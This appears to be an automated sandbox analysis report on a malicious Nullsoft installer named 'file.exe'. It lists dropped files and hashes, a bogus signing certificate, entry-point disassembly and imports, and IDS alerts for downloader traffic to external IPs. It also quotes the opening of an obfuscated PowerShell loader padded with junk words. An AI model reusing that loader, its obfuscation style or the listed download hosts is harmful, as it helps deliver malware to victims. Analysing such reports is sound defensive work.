                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown

                                                            Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type: data
                                                            Category: modified
                                                            Size (bytes): 8003
                                                            Entropy (8bit): 4.840877972214509
                                                            Encrypted: false
                                                            SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                            MD5: 106D01F562D751E62B702803895E93E0
                                                            SHA1: CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                            SHA-256: 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                            SHA-512: 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                            Malicious: false
                                                            Reputation: moderate, very likely benign file
                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                            Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type: ASCII text, with no line terminators
                                                            Category: dropped
                                                            Size (bytes): 60
                                                            Entropy (8bit): 4.038920595031593
                                                            Encrypted: false
                                                            SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5: D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious: false
                                                            Reputation: high, very likely benign file
                                                            Preview: # PowerShell test file to determine AppLocker lockdown mode

                                                            Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type: ASCII text, with no line terminators
                                                            Category: dropped
                                                            Size (bytes): 60
                                                            Entropy (8bit): 4.038920595031593
                                                            Encrypted: false
                                                            SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5: D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious: false
                                                            Reputation: high, very likely benign file
                                                            Preview: # PowerShell test file to determine AppLocker lockdown mode

                                                            Process: C:\Users\user\Desktop\file.exe
                                                            File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category: dropped
                                                            Size (bytes): 7168
                                                            Entropy (8bit): 5.2959870663251625
                                                            Encrypted: false
                                                            SSDEEP: 96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                            MD5: B4579BC396ACE8CAFD9E825FF63FE244
                                                            SHA1: 32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                            SHA-256: 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                            SHA-512: 3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                            Malicious: false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious
                                                            • Filename: Ze1Ueabtx5.img, Detection: malicious
                                                            • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious
                                                            • Filename: 4hIPvzV6a2.exe, Detection: malicious
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
                                                            • Filename: 3Dut8dFCwD.exe, Detection: malicious
                                                            • Filename: Ms63nDrOBa.exe, Detection: malicious
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious
                                                            Reputation: moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Process: C:\Users\user\Desktop\file.exe
                                                            File Type: ASCII text, with very long lines (65536), with no line terminators
                                                            Category: dropped
                                                            Size (bytes): 72766
                                                            Entropy (8bit): 5.199237020314929
                                                            Encrypted: false
                                                            SSDEEP: 1536:13twgdZfLUclpxZnFhI/8Qb+X/JDOsq3eJwdCzDzZier9:13qUFUclCzb+xDO/arr9
                                                            MD5: 99EBA9ECC95F62898E4DF3AA12CB4624
                                                            SHA1: C21A35B90111B01C32C9E963B20AAA01B35658A6
                                                            SHA-256: B8408FC8DF3CD3C0938D8314568B278D72CB102B8D128A11608CAB75A2046B21
                                                            SHA-512: 42B40C55DC01197D21B6DBB5C4D0CA77BE2CA890A70FAB1E0022DEFBDE7204A8B19387915FE144B540333BDB72FDE557E8F1673131830FAF455AA0FB25E6A347
                                                            Malicious: false
                                                            Preview:$Raderingens=$Vagabonds;<#Winning Nonvibrator Reachableness Lithographing Filcursoren #><#Bekend Suppeskeens Consideration #><#Hjalmer Misperceiving Luvgirig Taktmssigt Expensiveness Fanglinernes Neohexane #><#Replicas Mbelpoliturers Rustiest Landgreverne Incloses nonmodern #><#Valeting Frstebehandlingernes Alcoholically unvivid Unwork Hyperpituitarism #><#wee Dawnstreak Bakuninism Sublecturer Alfredo Normalness Circumvent #>$Impositive = "longere;Modelre`$EjermndS Makedow lkegra Treledn SadneskPostulaeacti,otyKastanioRepromioSurr.almGarganee Dis nfr stony a enshanIntensigK lkninsShivere=Yarboro`$kogevasSBrevbakwChromopaDeoxyrinSkifterkImprecaeReedlinyAv.adoriF nnedesOmkartepprfabrieVelsignh.efunctuSubjicieCardiosr Militas quawbe;StaurotfMis,ighu CaptornSchizo.c Walkent DantepiDekup,eoGdningsnEjendom yphaeHEavesdroFerielicSafariik SedimeeCoccothyConvertsUds iftp GestusiAfhjemllAudiogrlVirkelieOverb dr .olkeveOpbrugss Sand m Benzofl(sundhed`$KoleraePEtaper,aFnuggedeUnikummsCentau aC

                                                            Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Category: dropped
                                                            Size (bytes): 750104
                                                            Entropy (8bit): 7.620010644230869
                                                            Encrypted: false
                                                            SSDEEP: 12288:TfLdembnSidi8rrdTT4aQUh9IHUM1mPCeBxHnymwsXFDsiJjWlWVB0mPHp:TfLNnSsi8dTTCjmqePSrsXF4i7XPPJ
                                                            MD5: 7FBB332B55F872E61C8307E0B5242287
                                                            SHA1: B499466240EF01DA4A2CF380D709752B2E44232A
                                                            SHA-256: 9845ACC424512CC5B0C67DE96CE917624B5E80EE95EA4EA6A7CBC37B7C03EF63
                                                            SHA-512: E813F006263B87A5078BCA9C58B94567AC8DF627B27D44411774B797BDD7095F9BEBAFF8A1D2F0329B8FC63016199EF7E04EC17D68CE28B250CD3DA37C2E8D04
                                                            Malicious: true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.................................kK....@..........................................P...d...........h..p............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                            Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type: ASCII text, with CRLF line terminators
                                                            Category: dropped
                                                            Size (bytes): 26
                                                            Entropy (8bit): 3.95006375643621
                                                            Encrypted: false
                                                            SSDEEP: 3:ggPYV:rPYV
                                                            MD5: 187F488E27DB4AF347237FE461A079AD
                                                            SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious: true
                                                            Preview: [ZoneTransfer]....ZoneId=0

                                                            Process: C:\Users\user\Desktop\file.exe
                                                            File Type: data
                                                            Category: dropped
                                                            Size (bytes): 328009
                                                            Entropy (8bit): 1.2551228776153396
                                                            Encrypted: false
                                                            SSDEEP: 1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                                            MD5: 78C7002A6C29415CEA767894F99BDF01
                                                            SHA1: 37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                                            SHA-256: 414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                                            SHA-512: A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                                            Malicious: false
                                                            Preview: (mostly non-printable binary data; omitted)

                                                            Process: C:\Users\user\Desktop\file.exe
                                                            File Type: ASCII text, with CRLF line terminators
                                                            Category: dropped
                                                            Size (bytes): 453
                                                            Entropy (8bit): 4.241518252490206
                                                            Encrypted: false
                                                            SSDEEP: 6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                                            MD5: 261F38F05E7DE27DA302C07B62E1F94D
                                                            SHA1: 8D495D43FC7A2B40C52B8D31678F24B519257610
                                                            SHA-256: 50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                                            SHA-512: 62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                                            Malicious: false
                                                            Preview: stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.

                                                            Process: C:\Users\user\Desktop\file.exe
                                                            File Type: data
                                                            Category: dropped
                                                            Size (bytes): 340463
                                                            Entropy (8bit): 7.6883510403915185
                                                            Encrypted: false
                                                            SSDEEP: 6144:/UUvKKVQiIl/mdVzp9A2e3dLVKPbsKZpRqHrb5OmuwYjofT:MUvKKyAFOh3DwYKQuSfT
                                                            MD5: B7996FE76D831F7949992DA7E460B2F6
                                                            SHA1: AC086BA78FB87FD615A5C4B760EBB90057EBB46E
                                                            SHA-256: DBD8E48ED8E7EC0FBEAD479F69B3A733C33D2F814EF70161F7D65331CC069C02
                                                            SHA-512: 4721F5D304B7077C29FB87923B8278E326E1EEBB24446BA450445006C7976D75BD529A119AF3E72DA009FF4CC1907690417823EA95430962F35FFFE598DD2F77
                                                            Malicious: false
                                                            Preview: (mostly non-printable binary data; omitted)
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):245776
                                                            Entropy (8bit):1.2423947315855175
                                                            Encrypted:false
                                                            SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                                            MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                                            SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                                            SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                                            SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):452228
                                                            Entropy (8bit):1.250842541049128
                                                            Encrypted:false
                                                            SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                                            MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                                            SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                                            SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                                            SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                                            Malicious:false
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.620010644230869
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:file.exe
                                                            File size:750'104 bytes
                                                            MD5:7fbb332b55f872e61c8307e0b5242287
                                                            SHA1:b499466240ef01da4a2cf380d709752b2e44232a
                                                            SHA256:9845acc424512cc5b0c67de96ce917624b5e80ee95ea4ea6a7cbc37b7c03ef63
                                                            SHA512:e813f006263b87a5078bca9c58b94567ac8df627b27d44411774b797bdd7095f9bebaff8a1d2f0329b8fc63016199ef7e04ec17d68ce28b250cd3da37c2e8d04
                                                            SSDEEP:12288:TfLdembnSidi8rrdTT4aQUh9IHUM1mPCeBxHnymwsXFDsiJjWlWVB0mPHp:TfLNnSsi8dTTCjmqePSrsXF4i7XPPJ
                                                            TLSH:06F412093FB8E6F3C0D16D3915B243561BF0B19615496F137310BF4AA9AE6A3980EFE4
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                                            Icon Hash:2b25372d4e5ad12f
                                                            Entrypoint:0x403532
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                            Signature Valid:false
                                                            Signature Issuer:CN="Dumdristig Cathetometer ", O=Nonculpably, L=Medaryville, S=Indiana, C=US
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before:13/05/2024 04:15:20
                                                            Not After:13/05/2027 04:15:20
                                                            Subject Chain
                                                            • CN="Dumdristig Cathetometer ", O=Nonculpably, L=Medaryville, S=Indiana, C=US
                                                            Version:3
                                                            Thumbprint MD5:2125E78073B3DE10354E99A49884F940
                                                            Thumbprint SHA-1:633626C811E5AD013D25FF7C0026F7D7152AC243
                                                            Thumbprint SHA-256:ECEA41CEFFE02297DF1297EBEE32E2BD6E688EF8E19AF9254DAF23053AB9C26F
                                                            Serial:44FB76A8AED1ADDCF3394332BFEEF80025A47D57
                                                            Instruction
                                                            sub esp, 000003F8h
                                                            push ebp
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebp, ebp
                                                            push 00008001h
                                                            mov dword ptr [esp+20h], ebp
                                                            mov dword ptr [esp+18h], 0040A2D8h
                                                            mov dword ptr [esp+14h], ebp
                                                            call dword ptr [004080A4h]
                                                            mov esi, dword ptr [004080A8h]
                                                            lea eax, dword ptr [esp+34h]
                                                            push eax
                                                            mov dword ptr [esp+4Ch], ebp
                                                            mov dword ptr [esp+0000014Ch], ebp
                                                            mov dword ptr [esp+00000150h], ebp
                                                            mov dword ptr [esp+38h], 0000011Ch
                                                            call esi
                                                            test eax, eax
                                                            jne 00007FCB690670EAh
                                                            lea eax, dword ptr [esp+34h]
                                                            mov dword ptr [esp+34h], 00000114h
                                                            push eax
                                                            call esi
                                                            mov ax, word ptr [esp+48h]
                                                            mov ecx, dword ptr [esp+62h]
                                                            sub ax, 00000053h
                                                            add ecx, FFFFFFD0h
                                                            neg ax
                                                            sbb eax, eax
                                                            mov byte ptr [esp+0000014Eh], 00000004h
                                                            not eax
                                                            and eax, ecx
                                                            mov word ptr [esp+00000148h], ax
                                                            cmp dword ptr [esp+38h], 0Ah
                                                            jnc 00007FCB690670B8h
                                                            and word ptr [esp+42h], 0000h
                                                            mov eax, dword ptr [esp+40h]
                                                            movzx ecx, byte ptr [esp+3Ch]
                                                            mov dword ptr [004347B8h], eax
                                                            xor eax, eax
                                                            mov ah, byte ptr [esp+38h]
                                                            movzx eax, ax
                                                            or eax, ecx
                                                            xor ecx, ecx
                                                            mov ch, byte ptr [esp+00000148h]
                                                            movzx ecx, cx
                                                            shl eax, 10h
                                                            or eax, ecx
                                                            movzx ecx, byte ptr [esp+0000004Eh]
                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x65000 | 0x264e8 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb68a8 | 0x970 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x1000 | 0x68d8 | 0x6a00 | 742185983fa6320c910f81782213e56f | False | 0.6695165094339622 | data | 6.478461709868021 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data | 0xa000 | 0x2a818 | 0x600 | 9a9bf385a30f1656fc362172b16d9268 | False | 0.5247395833333334 | data | 4.172601271908501 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata | 0x35000 | 0x30000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc | 0x65000 | 0x264e8 | 0x26600 | 8c15b9178dda9297a3b68e6314e77cb0 | False | 0.48827488802931596 | data | 5.053989943267582 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_ICON | 0x652c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.4677629244055365
                                                            RT_ICON | 0x75af0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.5025751524069791
                                                            RT_ICON | 0x7ef98 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.5306377079482439
                                                            RT_ICON | 0x84420 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.5394426074633916
                                                            RT_ICON | 0x88648 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.5737551867219917
                                                            RT_DIALOG | 0x8abf0 | 0x100 | data | English | United States | 0.5234375
                                                            RT_DIALOG | 0x8acf0 | 0x11c | data | English | United States | 0.6056338028169014
                                                            RT_DIALOG | 0x8ae10 | 0xc4 | data | English | United States | 0.5918367346938775
                                                            RT_DIALOG | 0x8aed8 | 0x60 | data | English | United States | 0.7291666666666666
                                                            RT_GROUP_ICON | 0x8af38 | 0x4c | data | English | United States | 0.8157894736842105
                                                            RT_VERSION | 0x8af88 | 0x21c | data | English | United States | 0.5388888888888889
                                                            RT_MANIFEST | 0x8b1a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                            DLL | Import
                                                            ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                            SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                            ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                            COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                            USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                            GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                            KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                            Language of compilation system | Country where language is spoken | Map
                                                            English | United States |
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-09-25T16:01:26.987824+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49710 | 185.29.11.53 | 80 | TCP
                                                            2024-09-25T16:01:28.683636+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP
                                                            2024-09-25T16:01:30.386762+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP
                                                            2024-09-25T16:01:30.954113+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
                                                            2024-09-25T16:01:31.683648+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49716 | 132.226.247.73 | 80 | TCP
                                                            2024-09-25T16:01:34.877195+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | TCP
                                                            2024-09-25T16:01:39.227302+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | TCP
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Sep 25, 2024 16:01:27.327667952 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.327687025 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.327699900 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.327732086 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.327766895 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.327980995 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.328031063 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.328037024 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.328048944 CEST8049710185.29.11.53192.168.2.8
